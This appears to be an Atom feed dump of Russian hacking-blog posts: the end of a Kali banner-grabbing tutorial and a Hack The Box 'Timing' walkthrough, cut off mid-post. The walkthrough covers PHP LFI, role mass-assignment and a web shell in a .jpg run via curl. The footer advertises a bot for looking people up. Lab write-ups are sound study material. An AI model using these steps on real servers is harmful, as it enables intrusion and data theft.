  &lt;p id=&quot;zA7M&quot;&gt;1nc &amp;lt;hostname/ip_адрес&amp;gt;&lt;/p&gt;
  &lt;p id=&quot;9GRk&quot;&gt;Теперь введите &lt;strong&gt;HEAD HTTP/ /1.0&lt;/strong&gt; и нажмите Enter.&lt;/p&gt;
  &lt;ul id=&quot;vnoP&quot;&gt;
    &lt;li id=&quot;TBWQ&quot;&gt;&lt;strong&gt;HEAD&lt;/strong&gt; — это глагол HTTP, HTTP/ обозначает корень страницы.&lt;/li&gt;
    &lt;li id=&quot;y6qj&quot;&gt;&lt;strong&gt;/1.0&lt;/strong&gt; — версия HTTP.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;h3 id=&quot;Telnet&quot;&gt;Telnet&lt;/h3&gt;
  &lt;p id=&quot;IMdK&quot;&gt;В консоли Kali, выполните команду:&lt;/p&gt;
  &lt;p id=&quot;uthR&quot;&gt;1telnet &amp;lt;имя_хоста/ip_адрес&amp;gt;&lt;/p&gt;
  &lt;p id=&quot;fS2E&quot;&gt;Появится ​​подсказка.&lt;/p&gt;
  &lt;p id=&quot;ne7D&quot;&gt;Введите &lt;strong&gt;HEAD HTTP//1.0&lt;/strong&gt; и нажмите Enter.&lt;/p&gt;
  &lt;h3 id=&quot;Nikto&quot;&gt;Nikto&lt;/h3&gt;
  &lt;p id=&quot;7FPU&quot;&gt;Введите следующую команду и нажмите Enter:&lt;/p&gt;
  &lt;p id=&quot;1PVo&quot;&gt;1nikto -h&lt;/p&gt;
  &lt;p id=&quot;l9Z3&quot;&gt;Вы увидите баннер в качестве вывода. Нажмите &lt;strong&gt;Ctrl+C&lt;/strong&gt;, чтобы остановить.&lt;/p&gt;
  &lt;h3 id=&quot;Nmap&quot;&gt;Nmap&lt;/h3&gt;
  &lt;p id=&quot;1hD2&quot;&gt;Последний инструмент сбора баннеров на Kali Linux это популярный сканер &lt;a href=&quot;https://spy-soft.net/nmap-obnaruzhenie-xostov/&quot; target=&quot;_blank&quot;&gt;Nmap&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;qis3&quot;&gt;Подойдите к терминалу и введите&lt;/p&gt;
  &lt;p id=&quot;nB31&quot;&gt;1nmap -sV -A &amp;lt;имя_хоста/ip_адрес&amp;gt; -p 80&lt;/p&gt;
  &lt;p id=&quot;LwwQ&quot;&gt;Параметр:&lt;/p&gt;
  &lt;ul id=&quot;uyiV&quot;&gt;
    &lt;li id=&quot;kJKY&quot;&gt;-sV используется для определения версии службы.&lt;/li&gt;
    &lt;li id=&quot;APzi&quot;&gt;-A для агрессивного сканирования.&lt;/li&gt;
    &lt;li id=&quot;l7Jg&quot;&gt;-p для определения порта.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;mGq9&quot;&gt;&lt;strong&gt;Заключение&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;9vaa&quot;&gt;Мы рассмотрели популярные способы сбора баннеров на Кали. Конечно, существует множество других инструментов и методов для захвата баннеров, но это самые простые, которые сможете быстро освоить и использовать.&lt;/p&gt;
  &lt;p id=&quot;b2wT&quot;&gt;&lt;strong&gt;РЕКОМЕНДУЕМ:&lt;/strong&gt;&lt;/p&gt;
  &lt;ul id=&quot;JJxf&quot;&gt;
    &lt;li id=&quot;id1E&quot;&gt;&lt;a href=&quot;https://spy-soft.net/nmap-skrytoe-skanirovanie/&quot; target=&quot;_blank&quot;&gt;Скрытое сканирование хостов с Nmap&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;k9du&quot;&gt;&lt;a href=&quot;https://spy-soft.net/install-and-use-rustscan-kali-linux/&quot; target=&quot;_blank&quot;&gt;Использование сканера портов RustScan на Kali Linux&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;7hnr&quot;&gt;&lt;a href=&quot;https://spy-soft.net/banner-grabbing-kali-linux/&quot; target=&quot;_blank&quot;&gt;Источник&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;9f33&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f3/21/f321894a-18ef-4f4c-8ec5-c93d98dc8d69.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Y0OT&quot;&gt;&lt;strong&gt;Наши проекты:&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;vx7O&quot;&gt;- Кибер новости: &lt;a href=&quot;https://t.me/matrixleaks&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;the Matrix&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Хакинг: &lt;a href=&quot;https://t.me/+bby6PJAbqpNhOWZh&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;/me Hacker&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;- Кодинг: &lt;a href=&quot;https://t.me/+zBgEm0olmpxlMzA6&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Minor Code&lt;/strong&gt;&lt;/a&gt;&lt;br /&gt;👁 Пробить человека? Легко через нашего бота: &lt;a href=&quot;https://t.me/iprobivator_bot&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Мистер Пробиватор&lt;/strong&gt;&lt;/a&gt;&lt;/p&gt;

</content></entry><entry><id>matrix_supp:Vzlom-veb-servera-na-PHP-Hack-The-Box-Timing-06-09</id><link rel="alternate" type="text/html" href="https://teletype.in/@matrix_supp/Vzlom-veb-servera-na-PHP-Hack-The-Box-Timing-06-09?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=matrix_supp"></link><title>Взлом веб-сервера на PHP. Hack The Box Timing</title><published>2022-06-09T15:44:25.084Z</published><updated>2022-06-09T15:44:25.084Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/79/a0/79a01901-65e5-465e-bbd7-9c32da45d029.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/81/2a/812a716b-471d-42be-9de8-40ecf0cfcbd4.png&quot;&gt;В этой статье рассмотрим прохождение уязвимой машины Timing Hack The Box, в рамках которой будем взламывать веб-сервер на PHP. Для получения флага мы будем сканировать порты, экс­плу­атировать уяз­вимос­ти LFI и заг­рузим шел­л.</summary><content type="html">
  &lt;figure id=&quot;XdVz&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/81/2a/812a716b-471d-42be-9de8-40ecf0cfcbd4.png&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;mNrR&quot;&gt;В этой статье рассмотрим прохождение уязвимой машины Timing Hack The Box, в рамках которой будем &lt;a href=&quot;https://spy-soft.net/hack-the-box-bountyhunter/&quot; target=&quot;_blank&quot;&gt;взламывать веб-сервер на PHP&lt;/a&gt;. Для получения флага мы будем сканировать порты, экс­плу­атировать уяз­вимос­ти LFI и заг­рузим шел­л.&lt;/p&gt;
  &lt;p id=&quot;ciNk&quot;&gt;Еще по теме: &lt;a href=&quot;https://spy-soft.net/hack-wordpress/&quot; target=&quot;_blank&quot;&gt;Как взломать сайт WordPress&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;01H2&quot;&gt;Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация.&lt;strong&gt;Взлом веб-сервера на PHP&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;R6Ah&quot;&gt;Для начала до­бав­им IP-адрес машины в/etc/hosts:&lt;/p&gt;
  &lt;p id=&quot;02fp&quot;&gt;110.10.11.135 timing.htb&lt;/p&gt;
  &lt;p id=&quot;qcjI&quot;&gt;Начнем со сканирования портов. Это стан­дар­тная операция при любом пентесте. Сканирование портов позволит определить, какие служ­бы на машине при­нима­ют соеди­нение.&lt;/p&gt;
  &lt;p id=&quot;0DAG&quot;&gt;Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит резуль­таты сканирования:&lt;/p&gt;
  &lt;p id=&quot;Rvb5&quot;&gt;123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d &amp;#x27;/&amp;#x27; -f 1 | tr &amp;#x27;\n&amp;#x27; &amp;#x27;,&amp;#x27; | sed s/,$//)nmap -p$ports -A $1&lt;/p&gt;
  &lt;p id=&quot;pLAS&quot;&gt;Он дей­ству­ет в два эта­па. Пер­вый про­изво­дит­ просто быс­трое ска­ниро­вание, вто­рой — глубокое ска­ниро­вание, используя име­ющиеся скрип­ты (опция —A)&lt;/p&gt;
  &lt;figure id=&quot;dPG5&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/ba/23/ba23d13a-1733-4a3a-ad4f-1bf45d7efe8a.png&quot; /&gt;
    &lt;figcaption&gt;Результат сканирования&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;BJwS&quot;&gt;Сканер нашел два откры­тых пор­та:&lt;/p&gt;
  &lt;ul id=&quot;omMt&quot;&gt;
    &lt;li id=&quot;WtBy&quot;&gt;80 — веб‑сер­вер Apache 2.4.29;&lt;/li&gt;
    &lt;li id=&quot;dygy&quot;&gt;22 — служ­ба OpenSSH 7.6p1.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;PzkG&quot;&gt;На SSH нам ловить нечего, про­пус­каем его.&lt;/p&gt;
  &lt;p id=&quot;OKqv&quot;&gt;&lt;strong&gt;Брутфорс учеток&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;d0zL&quot;&gt;У нас пока нет учет­ных дан­ных, поэтому нет смыс­ла в анализе служ­б, которые как правило тре­буют авто­риза­ции (нап­ример, SSH). Единс­твен­ное, что можно сделать на данном этапе — перебрать пароли брут­ом, но уязвимые машины с Hack The Boxt практически всегда имеют другие решения. В реальности таких вари­антов может не быть, но можно всегда использовать &lt;a href=&quot;https://spy-soft.net/social-engineering-examples/&quot; target=&quot;_blank&quot;&gt;социальную инженерию&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;kM7S&quot;&gt;При попытке обра­щения к веб‑сер­веру про­исхо­дит редирект на стра­ницу/login.php и форму авто­риза­ции.&lt;/p&gt;
  &lt;figure id=&quot;VzwK&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5d/32/5d322640-79ab-4f01-be39-f408acf55857.png&quot; /&gt;
    &lt;figcaption&gt;Фор­ма авто­риза­ции login.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;jLCa&quot;&gt;Исходя из этого можно предположить, что это не однос­тра­нич­ный сайт, поэто­му будем пробовать отыскать скры­тые стра­ницы. Пер­вая стра­ница была в PHP, логично осталь­ные переби­рать тоже с расширением PHP. Я предпочитаю использовать для этой цели ска­нер &lt;strong&gt;ffuf&lt;/strong&gt;.&lt;/p&gt;
  &lt;p id=&quot;xDqP&quot;&gt;&lt;strong&gt;Сканирование веба c ffuf&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;Zwgp&quot;&gt;Пер­вое дей­ствие при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов. Для это­й цели вы можете исполь­зовать прог­раммы вро­де DIRB и &lt;a href=&quot;https://github.com/maurosoria/dirsearch&quot; target=&quot;_blank&quot;&gt;dirsearch&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;flNP&quot;&gt;Мне нравится лег­кий и очень быс­трый &lt;a href=&quot;https://github.com/ffuf/ffuf&quot; target=&quot;_blank&quot;&gt;ffuf&lt;/a&gt;. Параметры запуска:&lt;/p&gt;
  &lt;ul id=&quot;kCMv&quot;&gt;
    &lt;li id=&quot;JS2d&quot;&gt;-w — сло­варь (лично я предпочитаю сло­вари из &lt;a href=&quot;https://github.com/danielmiessler/SecLists&quot; target=&quot;_blank&quot;&gt;SecLists&lt;/a&gt;);&lt;/li&gt;
    &lt;li id=&quot;vdu5&quot;&gt;-fc — исклю­чить из резуль­тата отве­ты с кодом 403;&lt;/li&gt;
    &lt;li id=&quot;bVPE&quot;&gt;-u — URL;&lt;/li&gt;
    &lt;li id=&quot;LNv9&quot;&gt;-t — количес­тво потоков.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;sZMX&quot;&gt;За­пус­каем &lt;strong&gt;ffuf&lt;/strong&gt; с парамет­рами:&lt;/p&gt;
  &lt;p id=&quot;uqz7&quot;&gt;1ffuf -u http://timing.htb/FUZZ -t 256 -w php_files_common.txt&lt;/p&gt;
  &lt;figure id=&quot;JQbI&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/50/fb/50fb9bb0-f902-41f6-a1fb-995683250a9e.png&quot; /&gt;
    &lt;figcaption&gt;Ре­зуль­тат ска­ниро­вания PHP-фай­лов&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QpL0&quot;&gt;Сканер нашел мно­жество фай­лов, теперь попробуем найти скры­тые катало­ги.&lt;/p&gt;
  &lt;p id=&quot;Zdoi&quot;&gt;1ffuf -u http://timing.htb/FUZZ -t 256 -w directory_2.3_medium_lowercase.txt&lt;/p&gt;
  &lt;figure id=&quot;Cv97&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/47/74/4774a3c6-2ddd-4fa7-9b9a-e1dd7c355c1d.png&quot; /&gt;
    &lt;figcaption&gt;Ска­ниро­вание скры­тых катало­гов&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XPwm&quot;&gt;Сканер находит катало­ги использующиеся для хра­нения скрип­тов и изоб­ражений. И это все. Ска­ниро­вание поддоменов и фай­лов резервных копий нечего не дало.&lt;/p&gt;
  &lt;p id=&quot;YAOT&quot;&gt;Попробуем поискать парамет­ры. Для ска­ниро­вания разумеется выбираем стра­ницу &lt;strong&gt;image.php&lt;/strong&gt;, которая по идее дол­жна воз­вра­щать изоб­ражения. Так как мы пока не зна­ем, что именно будет переда­но в качес­тве зна­чения парамет­ра, попытается передать само наз­вание стра­ницы, надеясь получить какую-то ошиб­ку.&lt;/p&gt;
  &lt;p id=&quot;kq64&quot;&gt;1ffuf -u &amp;#x27;http://timing.htb/image.php?FUZZ=../image.php&amp;#x27; -t 256 -w parameters.txt -fs 0&lt;/p&gt;
  &lt;figure id=&quot;2fHM&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/22/ae/22ae2247-e77c-4777-a85f-7784c650b51e.png&quot; /&gt;
    &lt;figcaption&gt;Ска­ниро­вание парамет­ра&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;8Stv&quot;&gt;Мы наш­ли один параметр —img. И теперь можно зап­росить файл с кар­тинкой по его наз­ванию. Попытаемся таким образом снять какой‑нибудь сис­темный файл, задав отно­ситель­ный путь.&lt;/p&gt;
  &lt;figure id=&quot;ANJV&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/db/85/db85ff12-e4b9-4e2a-b919-c7fe8f7be041.png&quot; /&gt;
    &lt;figcaption&gt;Атака обнаружена&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vMoB&quot;&gt;Попытка не удалась. Нас атаку обнаружили!&lt;/p&gt;
  &lt;p id=&quot;sU4t&quot;&gt;Видимо в данном конкретном случае исполь­зуют­ся какие‑то филь­тры, которые не позволяют нам читать файлы. Я поп­робовал раз­ные вари­анты обер­ток для парамет­ра и понял, что сра­баты­вает вот такой зап­рос:&lt;/p&gt;
  &lt;p id=&quot;xqi1&quot;&gt;12/image.php?img=php://filter/convert.base64-encode/resource=index.phpСправка: LFI в PHP&lt;/p&gt;
  &lt;p id=&quot;ldd1&quot;&gt;Local file inclusion (LFI) — тех­ника, которую исполь­зуют­ для получе­ния дос­тупа к фай­лам в сис­теме через веб‑сер­вер. Что­бы веб-сер­вер отоб­разил файл, вместо попытки выполнения, ему следует передать «обер­тку» — это коман­ды, которые закоди­руют файл. Пос­ле его получе­ния нужно лишь рас­кодиро­вать его обратно. Есть мно­жес­тво различных &lt;a href=&quot;https://github.com/payloadbox/rfi-lfi-payload-list&quot; target=&quot;_blank&quot;&gt;го­товых обер­ток&lt;/a&gt;, которые вы можете использовать в пен­тесте.&lt;/p&gt;
  &lt;p id=&quot;A50e&quot;&gt;Со­дер­жимое получен­ной в ответ стра­ницы, будет закоди­рова­но в Base64. Мож­но декоди­ровать пря­мо в Burp, нажав сочетание клавиш &lt;strong&gt;Ctrl-Shift-B&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;d5VA&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/25/58/25588a1b-b8d3-4aa3-92a1-22f9a629269a.png&quot; /&gt;
    &lt;figcaption&gt;Код стра­ницы index.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;dlpu&quot;&gt;Таким образом мы можем получить код всех страниц, просмотрим все страницы и среди них оисходный код стра­ницы login.php.&lt;/p&gt;
  &lt;figure id=&quot;LfLM&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/66/1d/661db63b-9f08-4240-af8f-41471a69140d.png&quot; /&gt;
    &lt;figcaption&gt;Ис­ходный код login.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;yPKz&quot;&gt;Наше внимание привлекает строка 10 — под­клю­чения фай­ла &lt;strong&gt;db_conn.php&lt;/strong&gt;. Там нашлась учет­ная запись для под­клю­чения к БД. Отроем и его.&lt;/p&gt;
  &lt;figure id=&quot;FCNM&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/73/a3/73a3a4b4-c28e-4984-b9ae-84f4e993ef1b.png&quot; /&gt;
    &lt;figcaption&gt;Ис­ходный код db_conn.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;SA6K&quot;&gt;Па­роль ни к чему не подходит, поэто­му продолжаем копать.&lt;/p&gt;
  &lt;p id=&quot;Yo8H&quot;&gt;Переходим к известным фай­лам. Нач­инаем с &lt;strong&gt;upload.php&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;rNpT&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/6f/52/6f5252ed-5347-4fa2-abca-7b88bf459e79.png&quot; /&gt;
    &lt;figcaption&gt;Ис­ходный код upload.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;TnoV&quot;&gt;В начале под­клю­чает­ся файл admin_auth_check.php. После зада­ются нужные парамет­ры для заг­ружен­ного фай­ла, в том чис­ле иfile_name. Создание имени файла происходит по такому алго­рит­му: берет­ся стро­ка&amp;#x27;$file_hash&amp;#x27;, после добав­ляет­ся текущее вре­мя (резуль­тат выпол­нения фун­кцииtime()) и все это кон­верти­рует­ся в хеш MD5, а затем добав­ляет­ся знак ниж­него под­черки­вания и имя фай­ла исполь­зуемое при заг­рузке. Файл дол­жен иметь рас­ширение &lt;strong&gt;jpg&lt;/strong&gt;. А в фай­ле &lt;strong&gt;admin_auth_check.php&lt;/strong&gt; толь­ко срав­нива­ется роль поль­зовате­ля.&lt;/p&gt;
  &lt;p id=&quot;x6zH&quot;&gt;Ес­ли бы$file_hash кто‑то по ошиб­ке не обер­нул в кавыч­ки, то было бы подставлено зна­чение перемен­ной, получен­ное от PHP-фун­кцииuniqid(). Раз­гадать уни­каль­ный иден­тифика­тор у нас бы не получилось, а без него единс­твен­ной прег­радой будет вывод фун­кцииtime().&lt;/p&gt;
  &lt;figure id=&quot;VgYy&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/fe/66/fe660d6a-a824-4d9c-8094-d25941bd42b9.png&quot; /&gt;
    &lt;figcaption&gt;Ис­ходный код admin_auth_check.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;w2SF&quot;&gt;Итак, здесь пока боль­ше ничего не де­лать, и требуется бру­т фор­мы авто­риза­ции. В начале най­дем име­на поль­зовате­лей, к при­меру в фай­ле &lt;strong&gt;/etc/passwd&lt;/strong&gt;.&lt;/p&gt;
  &lt;figure id=&quot;43ux&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/86/ca/86ca9272-439c-4c99-a456-1e8e625ea6f2.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое фай­ла /etc/passwd&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;l7Tg&quot;&gt;Но при под­боре пароля сра­зу поп­робу­ем исполь­зовать имя поль­зовате­ля в качес­тве пароля, и это дает нам дос­туп.&lt;/p&gt;
  &lt;figure id=&quot;Kwta&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9a/20/9a20d6bd-a2b8-4e81-9da6-57ecf0768593.png&quot; /&gt;
    &lt;figcaption&gt;Па­нель авто­ризо­ван­ного поль­зовате­ля&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;E34i&quot;&gt;Нам откры­вает­ся новая фун­кция — изме­нение про­филя.&lt;/p&gt;
  &lt;figure id=&quot;oYDj&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/31/cb/31cbbaec-501d-4af7-b8a5-f919b5c1ddca.png&quot; /&gt;
    &lt;figcaption&gt;Фор­ма изме­нения про­филя&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;iCFL&quot;&gt;Форма изменения профиляФор­ма изме­нения про­филя&lt;/p&gt;
  &lt;p id=&quot;7quS&quot;&gt;При отправ­ке дан­ных фор­мы прос­мотрим, куда они шлют­ся, а потом получим код этой стра­ницы, что­бы прос­мотреть, как обра­баты­вают­ся дан­ные.&lt;/p&gt;
  &lt;figure id=&quot;sTXZ&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4a/54/4a544a42-68f3-48d9-93fc-c98ae16ab656.png&quot; /&gt;
    &lt;figcaption&gt;Ис­тория зап­росов в Burp&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;uyoE&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bd/da/bddab184-af9e-42af-98d1-31ffce5dd85d.png&quot; /&gt;
    &lt;figcaption&gt;Ис­ходный код update.php&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;1YPl&quot;&gt;Ви­дим, что в обра­бот­чике на один параметр боль­ше, чем отправ­ляет­ся через фор­му. Зна­чит, мы можем добавитьrole и задать любую роль. Это дол­жно дать нам при­виле­гиро­ван­ный кон­текст.&lt;/p&gt;
  &lt;figure id=&quot;1Ejq&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/60/cd/60cdc513-1359-48c4-b6e2-86b41ef9c678.png&quot; /&gt;
    &lt;figcaption&gt;Но­вый зап­рос&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;BOZg&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/34/c9/34c9404e-4552-4628-8a76-43fdcccb87ef.png&quot; /&gt;
    &lt;figcaption&gt;От­вет сер­вера&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Mi88&quot;&gt;В ито­ге мы получа­ем ответ со все­ми перечис­ленны­ми парамет­рами, а на самой стра­нице появ­ляет­ся ссыл­ка на панель адми­нис­тра­тора.&lt;/p&gt;
  &lt;figure id=&quot;DHyV&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b3/a6/b3a69ae0-31c0-46f5-b308-d31293b89a90.png&quot; /&gt;
    &lt;figcaption&gt;Глав­ная стра­ница адми­нис­тра­тора&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4Dpn&quot;&gt;С панели адми­нис­тра­тора нам откры­вает­ся фун­кция заг­рузки ава­тара.&lt;/p&gt;
  &lt;figure id=&quot;dJZ8&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/37/24/3724c800-773d-4eb9-b587-177d3506b752.png&quot; /&gt;
    &lt;figcaption&gt;Фор­ма заг­рузки фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Qol9&quot;&gt;Мы зна­ем, что это дол­жен быть файл с рас­ширени­ем jpg. Но вот толь­ко его содер­жимое не про­веря­ется, поэто­му мы можем записать туда код на PHP и затем поп­робовать выпол­нить. Запишем сле­дующий прос­той PHP-шелл, выпол­няющий при­нятую коман­ду, и заг­рузим файл на сер­вер.&lt;/p&gt;
  &lt;p id=&quot;RtCo&quot;&gt;1echo &amp;#x27;&amp;lt;!--?php echo system($_GET[&amp;quot;cmd&amp;quot;]);?--&amp;gt;&amp;#x27; &amp;gt; test.jpg&lt;/p&gt;
  &lt;figure id=&quot;T54e&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/a7/47/a747b094-eaa4-43c8-b763-edc967b2e8e8.png&quot; /&gt;
    &lt;figcaption&gt;Со­обще­ние о заг­рузке фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;ljrP&quot;&gt;Файл успешно заг­ружен, теперь опре­делим­ся с име­нем, под которым он сох­ранил­ся на сер­вере. Для это­го вспом­ним прин­цип, по которо­му он фор­миру­ется.&lt;/p&gt;
  &lt;figure id=&quot;nt9y&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f4/f1/f4f1cc2f-a355-4543-8453-fb1814b02fe2.png&quot; /&gt;
    &lt;figcaption&gt;Код фор­мирова­ния име­ни заг­ружен­ного фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;14t9&quot;&gt;Единс­твен­ная перемен­ная, которую нам оста­лось получить, — зна­чение фун­кции time(). Эта фун­кция воз­вра­щает количес­тво секунд, про­шед­ших с 00:00:00 01.01.1970. И если мы зна­ем вре­мя заг­рузки фай­ла, уста­нов­ленное на сер­вере, мы смо­жем получить это зна­чение. Так как вся работа выпол­няет­ся через Burp, в исто­рии зап­росов най­дем HTTP-заголо­вок отве­та сер­вера. В заголов­ке Date будет ука­зано нуж­ное нам вре­мя.&lt;/p&gt;
  &lt;figure id=&quot;VTsy&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/20/0d/200d51be-4849-4703-8691-4ca4e2851d43.png&quot; /&gt;
    &lt;figcaption&gt;HTTP-заголо­вок отве­та сер­вера при заг­рузке фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;LoQt&quot;&gt;Те­перь мы можем получить зна­чение MD5 от сло­жения всех строк:&lt;/p&gt;
  &lt;p id=&quot;wXNQ&quot;&gt;1echo md5(&amp;#x27;$file_hash&amp;#x27; . strtotime(&amp;quot;Wed, 05 Jan 2022 13:19:51 GMT&amp;quot;));&lt;/p&gt;
  &lt;figure id=&quot;AQYR&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5e/1c/5e1c29c8-cd0f-4978-b0df-0067aea7f5e1.png&quot; /&gt;
    &lt;figcaption&gt;Рас­чет пер­вой час­ти име­ни фай­ла&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;zPxA&quot;&gt;Нам нуж­но обра­щать­ся к фай­лу вот с таким име­нем:&lt;/p&gt;
  &lt;p id=&quot;eo29&quot;&gt;1e3879d6c6425db4ad6e139681d11693d_test.jpg&lt;/p&gt;
  &lt;p id=&quot;Pwgb&quot;&gt;Поп­робу­ем с помощью нашего хеша выпол­нить базовую коман­ду id.&lt;/p&gt;
  &lt;p id=&quot;cIlg&quot;&gt;1curl &amp;#x27;http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&amp;amp;cmd=id&amp;#x27;&lt;/p&gt;
  &lt;figure id=&quot;T2A4&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bb/59/bb59b34c-98b9-4f10-9d25-f4925fd2be88.png&quot; /&gt;
    &lt;figcaption&gt;Вы­пол­нение коман­ды id&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;DXku&quot;&gt;Ко­ман­да успешно выпол­нена, что озна­чает получе­ние дос­тупа к хос­ту.&lt;/p&gt;
  &lt;p id=&quot;U16M&quot;&gt;Продвижение&lt;/p&gt;
  &lt;p id=&quot;Dzlc&quot;&gt;Для даль­нейше­го прод­вижения нам необ­ходимо най­ти учет­ные дан­ные. Для это­го пред­сто­ит изу­чить фай­лы в катало­ге веб‑сер­вера, все­воз­можные резер­вные копии и дру­гие поль­зователь­ские фай­лы. Так находим бэкапы исходни­ков в катало­ге /opt.&lt;/p&gt;
  &lt;figure id=&quot;61xl&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/f7/7d/f77d8792-0f6c-41cf-8114-1acd7bbbae26.png&quot; /&gt;
    &lt;figcaption&gt;Со­дер­жимое катало­га /opt&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;XiRz&quot;&gt;Ко­пиру­ем архив в каталог веб‑сер­вера и лег­ко ска­чива­ем через бра­узер.&lt;/p&gt;
  &lt;p id=&quot;oEtQ&quot;&gt;1curl &amp;#x27;http://timing.htb/image.php?img=images/uploads/e3879d6c6425db4ad6e139681d11693d_test.jpg&amp;amp;cmd=cp+/opt/source-files-backup.zip+./&amp;#x27;&lt;/p&gt;
  &lt;figure id=&quot;g51d&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/97/4b/974bbdf0-9347-4ec9-b92c-e6c065985dd0.png&quot; /&gt;
    &lt;figcaption&gt;Ска­чива­ние исходных кодов через бра­узер&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Q3Cq&quot;&gt;В архи­ве при­сутс­тву­ет каталог с рас­ширени­ем git. Это поз­волит нам получить дос­туп к исто­рии изме­нений фай­лов.&lt;/p&gt;
  &lt;figure id=&quot;BxBX&quot;&gt;
